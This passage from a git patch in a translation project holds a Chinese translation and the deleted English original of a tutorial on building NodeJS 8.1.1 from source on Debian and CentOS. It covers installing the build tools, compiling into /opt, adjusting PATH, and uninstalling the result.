的系统上,你或许遇到过 [构建要素][22] 包,它就是这种用作。在基于 Red Hat 的分发版中,它将是  _“开发工具”_ 组。 + +### 在 CentOS 7.0 上 + +``` +[itsfoss@centos ~]$ git clone --depth 1 \ + --branch v8.1.1 \ + https://github.com/nodejs/node +-bash: git: command not found +``` + +命令没有找到?可以用 `yum` 包管理器去安装它: + +``` +[itsfoss@centos ~]$ sudo yum install git +``` + +``` +[itsfoss@centos ~]$ git clone --depth 1 \ + --branch v8.1.1 \ + https://github.com/nodejs/node && echo ok +[...] +ok +``` + +``` +[itsfoss@centos ~]$ sudo mkdir /opt/node-v8.1.1 +[itsfoss@centos ~]$ sudo ln -sT node-v8.1.1 /opt/node +``` + +``` +[itsfoss@centos ~]$ cd node +[itsfoss@centos node]$ ./configure --prefix=/opt/node-v8.1.1/ +WARNING: failed to autodetect C++ compiler version (CXX=g++) +WARNING: failed to autodetect C compiler version (CC=gcc) +Node.js configure error: No acceptable C compiler found! + + Please make sure you have a C compiler installed on your system and/or + consider adjusting the CC environment variable if you installed + it in a non-standard prefix. +``` + +你知道的:NodeJS 是使用 C++ 语言写的,但是,我的系统缺少合适的编译器。Yum 可以帮到你。因为,我不是一个合格的 CentOS 用户,在因特网上准确地找到包含 g++ 编译器的包的名字是很困难的。这个页面会指导我:[https://superuser.com/questions/590808/yum-install-gcc-g-doesnt-work-anymore-in-centos-6-4][23] + +``` +[itsfoss@centos node]$ sudo yum install gcc-c++ +[itsfoss@centos node]$ ./configure --prefix=/opt/node-v8.1.1/ && echo ok +[...] +ok +``` + +``` +[itsfoss@centos node]$ make -j9 && echo ok +[...] +ok +``` + +``` +[itsfoss@centos node]$ sudo make install && echo ok +[...] +ok +``` + +``` +[itsfoss@centos node]$ /opt/node/bin/node --version +v8.1.1 +``` + +再次成功! + +### C. 从源代码中对要安装的软件做一些改变 + +你从源代码中安装一个软件,可能是因为你的分发仓库中没有一个可用的特定版本。或者因为你想去 _修改_ 那个程序。也可能是修复一个 bug 或者增加一个特性。毕竟,开源软件这些都可以做到。因此,我将抓住这个机会,让你亲自体验怎么去编译你自己的软件。 + +在这里,我将在 NodeJS 源代码上生成一个主要的改变。然后,我们将看到我们的改变将被纳入到软件的编译版本中: + +用你喜欢的 [文本编辑器][24](如,vim、nano、gedit、 … )打开文件 `node/src/node.cc`。然后,尝试找到如下的代码片段: + +``` + if (debug_options.ParseOption(argv[0], arg)) { + // Done, consumed by DebugOptions::ParseOption(). + } else if (strcmp(arg, "--version") == 0 || strcmp(arg, "-v") == 0) { + printf("%s\n", NODE_VERSION); + exit(0); + } else if (strcmp(arg, "--help") == 0 || strcmp(arg, "-h") == 0) { + PrintHelp(); + exit(0); + } +``` + +它在 [文件的 3830 行][25] 附近。然后,修改包含 `printf` 的行,将它替换成如下内容: + +``` + printf("%s (compiled by myself)\n", NODE_VERSION); +``` + +然后,返回到你的终端。在继续之前,_为了对强大的 Git 支持有更多的了解_,你可以去检查一下,你修改是文件是否正确: + +``` +diff --git a/src/node.cc b/src/node.cc +index bbce1022..a5618b57 100644 +--- a/src/node.cc ++++ b/src/node.cc +@@ -3828,7 +3828,7 @@ static void ParseArgs(int* argc, + if (debug_options.ParseOption(argv[0], arg)) { + // Done, consumed by DebugOptions::ParseOption(). + } else if (strcmp(arg, "--version") == 0 || strcmp(arg, "-v") == 0) { +- printf("%s\n", NODE_VERSION); ++ printf("%s (compiled by myself)\n", NODE_VERSION); + exit(0); + } else if (strcmp(arg, "--help") == 0 || strcmp(arg, "-h") == 0) { + PrintHelp(); +``` + +在你改变的行之前,你将看到一个 “-” (减号标志)。而在改变之后的行前面有一个 “+” (加号标志)。 + +现在可以去重新编译并重新安装你的软件了: + +``` +make -j9 && sudo make install && echo ok +[...] +ok +``` + +这个时候,可能失败的唯一原因就是你改变代码时的输入错误。如果就是这种情况,在文本编辑器中重新打开 `node/src/node.cc` 文件并修复错误。 + +一旦你管理的一个编译和安装的新修改版本的 NodeJS,将可以去检查你的修改是否包含到软件中: + +``` +itsfoss@debian:~/node$ /opt/node/bin/node --version +v8.1.1 (compiled by myself) +``` + +恭喜你!你生成了开源程序中你的第一个改变! + +### D. 让 shell 定位到定制构建的软件 + +到目前为止,你可能注意到,我通常启动我新编译的 NodeJS 软件是通过指定一个到二进制文件的绝对路径。 + +``` +/opt/node/bin/node +``` + +这是可以正常工作的。但是,这样太麻烦。实际上有两种办法可以去解决这个问题。但是,去理解它们,你必须首先明白,你的 shell 定位可执行文件是进入到通过在[环境变量][26]`PATH` 中指定的目录去查找的。 + +``` +itsfoss@debian:~/node$ echo $PATH +/usr/local/bin:/usr/bin:/bin:/usr/local/games:/usr/games +``` + +在 Debian 系统上,如果你不指定一个精确的目录做为命令名字的一部分,shell 将首先在 `/usr/local/bin` 中查找可执行程序,如果没有找到,然后进入 `/usr/bin` 中查找,如果没有找到,然后进入 `/bin`查找,如果没有找到,然后进入 `/usr/local/games` 查找,如果没有找到,然后进入 `/usr/games` 查找,如果没有找到,那么,shell 将报告一个错误,_“command not found”_。 + +由此,我们可以知道有两种方法去确保命令可以被 shell 访问到:通过将它增加到已经配置好的 `PATH` 目录中,或者将包含可执行程序的目录添加到 `PATH` 中。 + +### 从 /usr/local/bin 中添加一个链接 + +仅从 `/opt/node/bin` 中 _拷贝_ 节点二进制可执行文件到 `/usr/local/bin` 是将是一个错误的做法。因为,如果这么做,可执行程序将无法定位到在 `/opt/node/` 中的其它需要的组件。(常见的做法是软件在它自己的位置去定位它所需要的资源文件) + +因此,传统的做法是去使用一个符号链接: + +``` +itsfoss@debian:~/node$ sudo ln -sT /opt/node/bin/node /usr/local/bin/node +itsfoss@debian:~/node$ which -a node || echo not found +/usr/local/bin/node +itsfoss@debian:~/node$ node --version +v8.1.1 (compiled by myself) +``` + +这一个简单而有效的解决办法,尤其是,如果一个软件包是由好几个众所周知的可执行程序组成的,因为,你将为每个用户调用命令创建一个符号链接。例如,如果你熟悉 NodeJS,你知道应用的 `npm` 组件,也是 `/usr/local/bin` 中的符号链接。这只是,我让你做了一个练习。 + +### 修改 PATH + +首先,如果你尝试前面的解决方案,先移除前面创建的节点符号链接,去从一个干净的状态开始: + +``` +itsfoss@debian:~/node$ sudo rm /usr/local/bin/node +itsfoss@debian:~/node$ which -a node || echo not found +not found +``` + +现在,这里有一个不可思议的命令去改变你的 `PATH`: + +``` +itsfoss@debian:~/node$ export PATH="/opt/node/bin:${PATH}" +itsfoss@debian:~/node$ echo $PATH +/opt/node/bin:/usr/local/bin:/usr/bin:/bin:/usr/local/games:/usr/games +``` + +简单说就是,我用前面的内容替换了环境变量 `PATH` 中原先的内容,但是通过一个 `/opt/node/bin` 的前缀。因此,你可以想像一下,shell 将先进入到 `/opt/node/bin` 目录中查找可执行程序。我们也可以使用 `which` 命令去确认一下: + +``` +itsfoss@debian:~/node$ which -a node || echo not found +/opt/node/bin/node +itsfoss@debian:~/node$ node --version +v8.1.1 (compiled by myself) +``` + +鉴于 “link” 解决方案是永久的,只要创建到 `/usr/local/bin`的符号链接就行了,而对 `PATH` 的改变仅对进入到当前的 shell 生效。你可以自己做一些研究,如何做到对 `PATH` 的永久改变。给你一个提示,可以将它写到你的 “profile” 中。如果你找到这个解决方案,不要犹豫,通过下面的评论区共享给其它的读者! + +### E. 怎么去卸载刚才从源代码中安装的软件 + +因为我们定制编译的 NodeJS 软件全部在 `/opt/node-v8.1.1` 目录中,卸载它不需要做太多的工作,仅使用 `rm` 命令去删除那个目录即可: + +``` +sudo rm -rf /opt/node-v8.1.1 +``` + +注意:`sudo` 和 `rm -rf` 是 “非常危险的鸡尾酒!”,一定要在按下 “enter” 键之前多检查几次你的命令。你不会得到任何的确认信息,并且如果你删除了错误的目录它是不可恢复的 … + +然后,如果你修改了你的 `PATH`,你可以去恢复这些改变。它一点也不复杂。 + +如果你从 `/usr/local/bin` 创建了一个符号链接,你应该去删除它们: + +``` +itsfoss@debian:~/node$ sudo find /usr/local/bin \ + -type l \ + -ilname "/opt/node/*" \ + -print -delete +/usr/local/bin/node +``` + +### 等等? 依赖地狱在哪里? + +一个最终结论是,如果你读过有关的编译定制软件的文档,你可能听到关于 [依赖地狱][27] 的说法。那是在你能够成功编译一个软件之前,对那种烦人情况的一个呢称,你必须首先编译一个前提条件所需要的库,它又可能要求其它的库,而这些库有可能与你的系统上已经安装的其它软件不兼容。 + +作为你的分发版的包维护者的工作的一部分,去真正地解决那些依赖关系,确保你的系统上的各种软件都使用了可兼容的库,并且按正确的顺序去安装。 + +在这篇文章中,我特意选择了 NodeJS 去安装,是因为它几乎没有依赖。我说 “几乎” 是因为,实际上,它  _有_  依赖。但是,这些源代码的依赖已经预置到项目的源仓库中(在 `node/deps` 子目录下),因此,在你动手编译之前,你不用手动去下载和安装它们。 + +如果你有兴趣了解更多关于那个问题的知识和学习怎么去处理它。请在下面的评论区告诉我,它将是更高级别的文章的好主题! + +-------------------------------------------------------------------------------- + +作者简介: + +充满激情的工程师,职业是教师,我的目标是:热心分享我所教的内容,并让我的学生自己培养它们的技能。你也可以在我的网站上联系到我。 + +-------------------- + +via: https://itsfoss.com/install-software-from-source-code/ + +作者:[Sylvain Leroux ][a] +译者:[qhwdw](https://github.com/qhwdw) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://itsfoss.com/author/sylvain/ +[1]:https://itsfoss.com/author/sylvain/ +[2]:https://itsfoss.com/install-software-from-source-code/#comments +[3]:https://www.facebook.com/share.php?u=https%3A%2F%2Fitsfoss.com%2Finstall-software-from-source-code%2F%3Futm_source%3Dfacebook%26utm_medium%3Dsocial%26utm_campaign%3DSocialWarfare +[4]:https://twitter.com/share?original_referer=/&text=How+to+Install+Software+from+Source+Code%E2%80%A6+and+Remove+it+Afterwards&url=https://itsfoss.com/install-software-from-source-code/%3Futm_source%3Dtwitter%26utm_medium%3Dsocial%26utm_campaign%3DSocialWarfare&via=Yes_I_Know_IT +[5]:https://plus.google.com/share?url=https%3A%2F%2Fitsfoss.com%2Finstall-software-from-source-code%2F%3Futm_source%3DgooglePlus%26utm_medium%3Dsocial%26utm_campaign%3DSocialWarfare +[6]:https://www.linkedin.com/cws/share?url=https%3A%2F%2Fitsfoss.com%2Finstall-software-from-source-code%2F%3Futm_source%3DlinkedIn%26utm_medium%3Dsocial%26utm_campaign%3DSocialWarfare +[7]:https://www.reddit.com/submit?url=https://itsfoss.com/install-software-from-source-code/&title=How+to+Install+Software+from+Source+Code%E2%80%A6+and+Remove+it+Afterwards +[8]:https://itsfoss.com/remove-install-software-ubuntu/ +[9]:https://nodejs.org/en/ +[10]:https://github.com/nodejs/node +[11]:https://en.wikipedia.org/wiki/GitHub +[12]:https://en.wikipedia.org/wiki/Git +[13]:https://en.wikipedia.org/wiki/Version_control +[14]:https://stackoverflow.com/questions/1457103/how-is-a-tag-different-from-a-branch-which-should-i-use-here +[15]:https://en.wikipedia.org/wiki/Graphical_user_interface +[16]:https://en.wikipedia.org/wiki/GNU_Build_System +[17]:https://en.wikipedia.org/wiki/Make_%28software +[18]:https://itsfoss.com/pro-vim-tips/ +[19]:http://www.pathname.com/fhs/ +[20]:https://en.wikipedia.org/wiki/C%2B%2B +[21]:https://en.wikipedia.org/wiki/Compiler +[22]:https://packages.debian.org/sid/build-essential +[23]:https://superuser.com/questions/590808/yum-install-gcc-g-doesnt-work-anymore-in-centos-6-4 +[24]:https://en.wikipedia.org/wiki/List_of_text_editors +[25]:https://github.com/nodejs/node/blob/v8.1.1/src/node.cc#L3830 +[26]:https://en.wikipedia.org/wiki/Environment_variable +[27]:https://en.wikipedia.org/wiki/Dependency_hell From e836e73d07085bc87cf73ce593dd5f5a483acc13 Mon Sep 17 00:00:00 2001 From: qhwdw <33189910+qhwdw@users.noreply.github.com> Date: Wed, 29 Nov 2017 16:22:11 +0800 Subject: [PATCH 0057/1627] Translated by qhwdw Translated by qhwdw --- ...Source Code... and Remove it Afterwards.md | 517 ------------------ 1 file changed, 517 deletions(-) delete mode 100644 sources/tech/20171006 How to Install Software from Source Code... and Remove it Afterwards.md diff --git a/sources/tech/20171006 How to Install Software from Source Code... and Remove it Afterwards.md b/sources/tech/20171006 How to Install Software from Source Code... and Remove it Afterwards.md deleted file mode 100644 index d2b16a0b18..0000000000 --- a/sources/tech/20171006 How to Install Software from Source Code... and Remove it Afterwards.md +++ /dev/null @@ -1,517 +0,0 @@ -Translating by qhwdw -How to Install Software from Source Code… and Remove it Afterwards -============================================================ - -![How to install software from source code](https://itsfoss.com/wp-content/uploads/2017/10/install-software-from-source-code-linux-800x450.jpg) - - _Brief: This detailed guide explains how to install a program from source code in Linux and how to remove the software installed from the source code._ - -One of the greatest strength of your Linux distribution is its package manager and the associated software repository. With them, you have all the necessary tools and resources to download and install a new software on your computer in a completely automated manner. - -But despite all their efforts, the package maintainers cannot handle each and every use cases. Nor can they package all the software available out there. So there are still situations where you will have to compile and install a new software by yourself. As of myself, the most common reason, by far, I have to compile some software is when I need to run a very specific version. Or because I want to modify the source code or use some fancy compilation options. - -If your needs belong to that latter category, there are chances you already know what you do. But for the vast majority of Linux users, compiling and installing a software from the sources for the first time might look like an initiation ceremony: somewhat frightening; but with the promise to enter a new world of possibilities and to be part of a privileged community if you overcome that. - -[Suggested readHow To Install And Remove Software In Ubuntu [Complete Guide]][8] - -### A. Installing software from source code in Linux - -And that’s exactly what we will do here. For the purpose of that article, let’s say I need to install [NodeJS][9] 8.1.1 on my system. That version exactly. A version which is not available from the Debian repository: - -``` -sh$ apt-cache madison nodejs | grep amd64 - nodejs | 6.11.1~dfsg-1 | http://deb.debian.org/debian experimental/main amd64 Packages - nodejs | 4.8.2~dfsg-1 | http://ftp.fr.debian.org/debian stretch/main amd64 Packages - nodejs | 4.8.2~dfsg-1~bpo8+1 | http://ftp.fr.debian.org/debian jessie-backports/main amd64 Packages - nodejs | 0.10.29~dfsg-2 | http://ftp.fr.debian.org/debian jessie/main amd64 Packages - nodejs | 0.10.29~dfsg-1~bpo70+1 | http://ftp.fr.debian.org/debian wheezy-backports/main amd64 Packages -``` - -### Step 1: Getting the source code from GitHub - -Like many open-source projects, the sources of NodeJS can be found on GitHub: [https://github.com/nodejs/node][10] - -So, let’s go directly there. - -![The NodeJS official GitHub repository](https://itsfoss.com/wp-content/uploads/2017/07/nodejs-github-account.png) - -If you’re not familiar with [GitHub][11], [git][12] or any other [version control system][13] worth mentioning the repository contains the current source for the software, as well as a history of all the modifications made through the years to that software. Eventually up to the very first line written for that project. For the developers, keeping that history has many advantages. For us today, the main one is we will be able to get the sources from for the project as they were at any given point in time. More precisely, I will be able to get the sources as they were when the 8.1.1 version I want was released. Even if there were many modifications since then. - -![Choose the v8.1.1 tag in the NodeJS GitHub repository](https://itsfoss.com/wp-content/uploads/2017/07/nodejs-github-choose-revision-tag.png) - -On GitHub, you can use the “branch” button to navigate between different versions of the software. [“Branch” and “tags” are somewhat related concepts in Git][14]. Basically, the developers create “branch” and “tags” to keep track of important events in the project history, like when they start working on a new feature or when they publish a release. I will not go into the details here, all you need to know is I’m looking for the version  _tagged_  “v8.1.1” - -![The NodeJS GitHub repository as it was at the time the v8.1.1 tag was created](https://itsfoss.com/wp-content/uploads/2017/07/nodejs-github-revision-811.png) - -After having chosen on the “v8.1.1” tag, the page is refreshed, the most obvious change being the tag now appears as part of the URL. In addition, you will notice the file change date are different too. The source tree you are now seeing is the one that existed at the time the v8.1.1 tag was created. In some sense, you can think of a version control tool like git as a time travel machine, allowing you to go back and forth into a project history. - -![NodeJS GitHub repository download as a ZIP button](https://itsfoss.com/wp-content/uploads/2017/07/nodejs-github-revision-download-zip.png) - -At this point, we can download the sources of NodeJS 8.1.1\. You can’t miss the big blue button suggesting to download the ZIP archive of the project. As of myself, I will download and extract the ZIP from the command line for the sake of the explanation. But if you prefer using a [GUI][15] tool, don’t hesitate to do that instead: - -``` -wget https://github.com/nodejs/node/archive/v8.1.1.zip -unzip v8.1.1.zip -cd node-8.1.1/ -``` - -Downloading the ZIP archive works great. But if you want to do it “like a pro”, I would suggest using directly the `git` tool to download the sources. It is not complicated at all— and it will be a nice first contact with a tool you will often encounter: - -``` -# first ensure git is installed on your system -sh$ sudo apt-get install git -# Make a shallow clone the NodeJS repository at v8.1.1 -sh$ git clone --depth 1 \ - --branch v8.1.1 \ - https://github.com/nodejs/node -sh$ cd node/ -``` - -By the way, if you have any issue, just consider that first part of this article as a general introduction. Later I have more detailed explanations for Debian- and ReadHat-based distributions in order to help you troubleshoot common issues. - -Anyway, whenever you downloaded the source using `git` or as a ZIP archive, you should now have exactly the same source files in the current directory: - -``` -sh$ ls -android-configure BUILDING.md common.gypi doc Makefile src -AUTHORS CHANGELOG.md configure GOVERNANCE.md node.gyp test -benchmark CODE_OF_CONDUCT.md CONTRIBUTING.md lib node.gypi tools -BSDmakefile COLLABORATOR_GUIDE.md deps LICENSE README.md vcbuild.bat -``` - -### Step 2: Understanding the Build System of the program - -We usually talk about “compiling the sources”, but the compilation is only one of the phases required to produce a working software from its source. A build system is a set of tool and practices used to automate and articulate those different tasks in order to build entirely the software just by issuing few commands. - -If the concept is simple, the reality is somewhat more complicated. Because different projects or programming language may have different requirements. Or because of the programmer’s tastes. Or the supported platforms. Or for historical reason. Or… or.. there is an almost endless list of reasons to choose or create another build system. All that to say there are many different solutions used out there. - -NodeJS uses a [GNU-style build system][16]. This is a popular choice in the open source community. And once again, a good way to start your journey. - -Writing and tuning a build system is a pretty complex task. But for the “end user”, GNU-style build systems resume themselves in using two tools: `configure` and `make`. - -The `configure` file is a project-specific script that will check the destination system configuration and available feature in order to ensure the project can be built, eventually dealing with the specificities of the current platform. - -An important part of a typical `configure` job is to build the `Makefile`. That is the file containing the instructions required to effectively build the project. - -The [`make` tool][17]), on the other hand, is a POSIX tool available on any Unix-like system. It will read the project-specific `Makefile` and perform the required operations to build and install your program. - -But, as always in the Linux world, you still have some latency to customize the build for your specific needs. - -``` -./configure --help -``` - -The `configure -help` command will show you all the available configuration options. Once again, this is very project-specific. And to be honest, it is sometimes required to dig into the project before fully understand the meaning of each and every configure option. - -But there is at least one standard GNU Autotools option that you must know: the `--prefix` option. This has to do with the file system hierarchy and the place your software will be installed. - -[Suggested read8 Vim Tips And Tricks That Will Make You A Pro User][18] - -### Step 3: The FHS - -The Linux file system hierarchy on a typical distribution mostly comply with the [Filesystem Hierarchy Standard (FHS)][19] - -That standard explains the purpose of the various directories of your system: `/usr`, `/tmp`, `/var` and so on. - -When using the GNU Autotools— and most other build systems— the default installation location for your new software will be `/usr/local`. Which is a good choice as according to the FSH  _“The /usr/local hierarchy is for use by the system administrator when installing software locally? It needs to be safe from being overwritten when the system software is updated. It may be used for programs and data that are shareable amongst a group of hosts, but not found in /usr.”_ - -The `/usr/local` hierarchy somehow replicates the root directory, and you will find there `/usr/local/bin` for the executable programs, `/usr/local/lib` for the libraries, `/usr/local/share` for architecture independent files and so on. - -The only issue when using the `/usr/local` tree for custom software installation is the files for all your software will be mixed there. Especially, after having installed a couple of software, it will be hard to track to which file exactly of `/usr/local/bin` and `/usr/local/lib` belongs to which software. That will not cause any issue to the system though. After all, `/usr/bin` is just about the same mess. But that will become an issue the day you will want to remove a manually installed software. - -To solve that issue, I usually prefer installing custom software in the `/opt`sub-tree instead. Once again, to quote the FHS: - -_”/opt is reserved for the installation of add-on application software packages. - -A package to be installed in /opt must locate its static files in a separate /opt/ or /opt/ directory tree, where is a name that describes the software package and is the provider’s LANANA registered name.”_ - -So we will create a sub-directory of `/opt` specifically for our custom NodeJS installation. And if someday I want to remove that software, I will simply have to remove that directory: - -``` -sh$ sudo mkdir /opt/node-v8.1.1 -sh$ sudo ln -sT node-v8.1.1 /opt/node -# What is the purpose of the symbolic link above? -# Read the article till the end--then try to answer that -# question in the comment section! - -sh$ ./configure --prefix=/opt/node-v8.1.1 -sh$ make -j9 && echo ok -# -j9 means run up to 9 parallel tasks to build the software. -# As a rule of thumb, use -j(N+1) where N is the number of cores -# of your system. That will maximize the CPU usage (one task per -# CPU thread/core + a provision of one extra task when a process -# is blocked by an I/O operation. -``` - -Anything but “ok” after the `make` command has completed would mean there was an error during the build process. As we ran a parallel build because of the `-j` option, it is not always easy to retrieve the error message given the large volume of output produced by the build system. - -In the case of issue, just restart `make`, but without the `-j` option this time. And the error should appear near the end of the output: - -``` -sh$ make -``` - -Finally, once the compilation has gone to the end, you can install your software to its location by running the command: - -``` -sh$ sudo make install -``` - -And test it: - -``` -sh$ /opt/node/bin/node --version -v8.1.1 -``` - -### B. What if things go wrong while installing from source code? - -What I’ve explained above is mostly what you can see on the “build instruction” page of a well-documented project. But given this article goal is to let you compile your first software from sources, it might worth taking the time to investigate some common issues. So, I will do the whole procedure again, but this time from a fresh and minimal Debian 9.0 and CentOS 7.0 systems. So you can see the error I encountered and how I solved them. - -### From Debian 9.0 “Stretch” - -``` -itsfoss@debian:~$ git clone --depth 1 \ - --branch v8.1.1 \ - https://github.com/nodejs/node --bash: git: command not found -``` - -This problem is quite easy to diagnosis and solve. Just install the `git` package: - -``` -itsfoss@debian:~$ sudo apt-get install git -``` - -``` -itsfoss@debian:~$ git clone --depth 1 \ - --branch v8.1.1 \ - https://github.com/nodejs/node && echo ok -[...] -ok -``` - -``` -itsfoss@debian:~/node$ sudo mkdir /opt/node-v8.1.1 -itsfoss@debian:~/node$ sudo ln -sT node-v8.1.1 /opt/node -``` - -No problem here. - -``` -itsfoss@debian:~/node$ ./configure --prefix=/opt/node-v8.1.1/ -WARNING: failed to autodetect C++ compiler version (CXX=g++) -WARNING: failed to autodetect C compiler version (CC=gcc) -Node.js configure error: No acceptable C compiler found! - Please make sure you have a C compiler installed on your system and/or - consider adjusting the CC environment variable if you installed - it in a non-standard prefix. -``` - -Obviously, to compile a project, you need a compiler. NodeJS being written using the [C++ language][20], we need a C++ [compiler][21]. Here I will install `g++`, the GNU C++ compiler for that purpose: - -``` -itsfoss@debian:~/node$ sudo apt-get install g++ -itsfoss@debian:~/node$ ./configure --prefix=/opt/node-v8.1.1/ && echo ok -[...] -ok -``` - -``` -itsfoss@debian:~/node$ make -j9 && echo ok --bash: make: command not found -``` - -One other missing tool. Same symptoms. Same solution: - -``` -itsfoss@debian:~/node$ sudo apt-get install make -itsfoss@debian:~/node$ make -j9 && echo ok -[...] -ok -``` - -``` -itsfoss@debian:~/node$ sudo make install -[...] -itsfoss@debian:~/node$ /opt/node/bin/node --version -v8.1.1 -``` - -Success! - -Please notice: I’ve installed the various tools one by one to show how to diagnosis the compilation issues and to show you the typical solution to solve those issues. But if you search more about that topic or read other tutorials, you will discover that most distributions have “meta-packages” acting as an umbrella to install some or all the typical tools used for compiling a software. On Debian-based systems, you will probably encounter the [build-essentials][22]package for that purpose. And on Red-Hat-based distributions, that will be the  _“Development Tools”_  group. - -### From CentOS 7.0 - -``` -[itsfoss@centos ~]$ git clone --depth 1 \ - --branch v8.1.1 \ - https://github.com/nodejs/node --bash: git: command not found -``` - -Command not found? Just install it using the `yum` package manager: - -``` -[itsfoss@centos ~]$ sudo yum install git -``` - -``` -[itsfoss@centos ~]$ git clone --depth 1 \ - --branch v8.1.1 \ - https://github.com/nodejs/node && echo ok -[...] -ok -``` - -``` -[itsfoss@centos ~]$ sudo mkdir /opt/node-v8.1.1 -[itsfoss@centos ~]$ sudo ln -sT node-v8.1.1 /opt/node -``` - -``` -[itsfoss@centos ~]$ cd node -[itsfoss@centos node]$ ./configure --prefix=/opt/node-v8.1.1/ -WARNING: failed to autodetect C++ compiler version (CXX=g++) -WARNING: failed to autodetect C compiler version (CC=gcc) -Node.js configure error: No acceptable C compiler found! - - Please make sure you have a C compiler installed on your system and/or - consider adjusting the CC environment variable if you installed - it in a non-standard prefix. -``` - -You guess it: NodeJS is written using the C++ language, but my system lacks the corresponding compiler. Yum to the rescue. As I’m not a regular CentOS user, I actually had to search on the Internet the exact name of the package containing the g++ compiler. Leading me to that page: [https://superuser.com/questions/590808/yum-install-gcc-g-doesnt-work-anymore-in-centos-6-4][23] - -``` -[itsfoss@centos node]$ sudo yum install gcc-c++ -[itsfoss@centos node]$ ./configure --prefix=/opt/node-v8.1.1/ && echo ok -[...] -ok -``` - -``` -[itsfoss@centos node]$ make -j9 && echo ok -[...] -ok -``` - -``` -[itsfoss@centos node]$ sudo make install && echo ok -[...] -ok -``` - -``` -[itsfoss@centos node]$ /opt/node/bin/node --version -v8.1.1 -``` - -Success. Again. - -### C. Making changes to the software installed from source code - -You may install a software from the source because you need a very specific version not available in your distribution repository. Or because you want to  _modify_  that program. Either to fix a bug or add a feature. After all, open-source is all about that. So I will take that opportunity to give you a taste of the power you have at hand now you are able to compile your own software. - -Here, we will make a minor change to the sources of NodeJS. And we will see if our change will be incorporated into the compiled version of the software: - -Open the file `node/src/node.cc` in your favorite [text editor][24] (vim, nano, gedit, … ). And try to locate that fragment of code: - -``` - if (debug_options.ParseOption(argv[0], arg)) { - // Done, consumed by DebugOptions::ParseOption(). - } else if (strcmp(arg, "--version") == 0 || strcmp(arg, "-v") == 0) { - printf("%s\n", NODE_VERSION); - exit(0); - } else if (strcmp(arg, "--help") == 0 || strcmp(arg, "-h") == 0) { - PrintHelp(); - exit(0); - } -``` - -It is around [line 3830 of the file][25]. Then modify the line containing `printf` to match that one instead: - -``` - printf("%s (compiled by myself)\n", NODE_VERSION); -``` - -Then head back to your terminal. Before going further— and to give you some more insight of the power behind git— you can check if you’ve modified the right file: - -``` -diff --git a/src/node.cc b/src/node.cc -index bbce1022..a5618b57 100644 ---- a/src/node.cc -+++ b/src/node.cc -@@ -3828,7 +3828,7 @@ static void ParseArgs(int* argc, - if (debug_options.ParseOption(argv[0], arg)) { - // Done, consumed by DebugOptions::ParseOption(). - } else if (strcmp(arg, "--version") == 0 || strcmp(arg, "-v") == 0) { -- printf("%s\n", NODE_VERSION); -+ printf("%s (compiled by myself)\n", NODE_VERSION); - exit(0); - } else if (strcmp(arg, "--help") == 0 || strcmp(arg, "-h") == 0) { - PrintHelp(); -``` - -You should see a “-” (minus sign) before the line as it was before you changed it. And a “+” (plus sign) before the line after your changes. - -It is now time to recompile and re-install your software: - -``` -make -j9 && sudo make install && echo ok -[...] -ok -``` - -This times, the only reason it might fail is that you’ve made a typo while changing the code. If this is the case, re-open the `node/src/node.cc` file in your text editor and fix the mistake. - -Once you’ve managed to compile and install that new modified NodeJS version, you will be able to check if your modifications were actually incorporated into the software: - -``` -itsfoss@debian:~/node$ /opt/node/bin/node --version -v8.1.1 (compiled by myself) -``` - -Congratulations! You’ve made your first change to an open-source program! - -### D. Let the shell locate our custom build software - -You may have noticed until now, I always launched my newly compiled NodeJS software by specifying the absolute path to the binary file. - -``` -/opt/node/bin/node -``` - -It works. But this is annoying, to say the least. There are actually two common ways of fixing that. But to understand them, you must first know your shell locates the executable files by looking for them only into the directories specified by the `PATH` [environment variable][26]. - -``` -itsfoss@debian:~/node$ echo $PATH -/usr/local/bin:/usr/bin:/bin:/usr/local/games:/usr/games -``` - -Here, on that Debian system, if you do not specify explicitly any directory as part of a command name, the shell will first look for that executable programs into `/usr/local/bin`, then if not found into `/usr/bin`, then if not found into `/bin` then if not found into `/usr/local/games` then if not found into `/usr/games`, then if not found … the shell will report an error  _“command not found”_ . - -Given that, we have two way to make a command accessible to the shell: by adding it to one of the already configured `PATH` directories. Or by adding the directory containing our executable file to the `PATH`. - -### Adding a link from /usr/local/bin - -Just  _copying_  the node binary executable from `/opt/node/bin` to `/usr/local/bin` would be a bad idea since by doing so, the executable program would no longer be able to locate the other required components belonging to `/opt/node/` (it’s a common practice for a software to locate its resource files relative to its own location). - -So, the traditional way of doing that is by using a symbolic link: - -``` -itsfoss@debian:~/node$ sudo ln -sT /opt/node/bin/node /usr/local/bin/node -itsfoss@debian:~/node$ which -a node || echo not found -/usr/local/bin/node -itsfoss@debian:~/node$ node --version -v8.1.1 (compiled by myself) -``` - -This is a simple and effective solution, especially if a software package is made of just few well known executable programs— since you have to create a symbolic link for each and every user-invokable commands. For example, if you’re familiar with NodeJS, you know the `npm` companion application I should symlink from `/usr/local/bin` too. But I let that to you as an exercise. - -### Modifying the PATH - -First, if you tried the preceding solution, remove the node symbolic link created previously to start from a clear state: - -``` -itsfoss@debian:~/node$ sudo rm /usr/local/bin/node -itsfoss@debian:~/node$ which -a node || echo not found -not found -``` - -And now, here is the magic command to change your `PATH`: - -``` -itsfoss@debian:~/node$ export PATH="/opt/node/bin:${PATH}" -itsfoss@debian:~/node$ echo $PATH -/opt/node/bin:/usr/local/bin:/usr/bin:/bin:/usr/local/games:/usr/games -``` - -Simply said, I replaced the content of the `PATH` environment variable by its previous content, but prefixed by `/opt/node/bin`. So, as you can imagine it now, the shell will look first into the `/opt/node/bin` directory for executable programs. We can confirm that using the `which` command: - -``` -itsfoss@debian:~/node$ which -a node || echo not found -/opt/node/bin/node -itsfoss@debian:~/node$ node --version -v8.1.1 (compiled by myself) -``` - -Whereas the “link” solution is permanent as soon as you’ve created the symbolic link into `/usr/local/bin`, the `PATH` change is effective only into the current shell. I let you do some researches by yourself to know how to make changes of the `PATH` permanents. As a hint, it has to do with your “profile”. If you find the solution, don’t hesitate to share that with the other readers by using the comment section below! - -### E. How to remove that newly installed software from source code - -Since our custom compiled NodeJS software sits completely in the `/opt/node-v8.1.1` directory, removing that software is not more work than using the `rm` command to remove that directory: - -``` -sudo rm -rf /opt/node-v8.1.1 -``` - -BEWARE: `sudo` and `rm -rf` are a dangerous cocktail! Always check your command twice before pressing the “enter” key. You won’t have any confirmation message and no undelete if you remove the wrong directory… - -Then, if you’ve modified your `PATH`, you will have to revert those changes. Which is not complicated at 